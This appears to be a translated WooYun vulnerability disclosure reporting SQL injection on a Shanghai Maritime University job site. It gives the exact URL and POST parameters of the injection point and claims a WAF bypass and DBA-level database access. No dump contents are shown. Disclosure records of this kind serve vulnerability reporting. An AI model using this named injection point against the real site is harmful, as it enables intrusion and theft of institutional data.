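2016-05-03: Details reported to the vendor; awaiting vendor response
2016-05-09: The vendor chose to ignore the vulnerability; details disclosed to the public
Loyalty, trustworthiness, sincerity, and respect
Injection point:
http://job.shmtu.edu.cn/qiyezhmm.asp?type=2
POST parameters: Submit=%c3%dc%c2%eb%b3%f5%ca%bc%bb%af&dwmc=1&dwzzjgdm=1
This site has a WAF, but it was bypassed with a few tamper scripts. DBA privileges are available:
Database users and passwords:
Databases:
A quick look at two databases to demonstrate the impact: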
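Filtering.
I hope the school's website becomes more and more secure!
Severity: No impact (ignored by vendor)
Ignored at: 2016-05-09 09:00
Vulnerability Rank: 4 (WooYun rating)
None yet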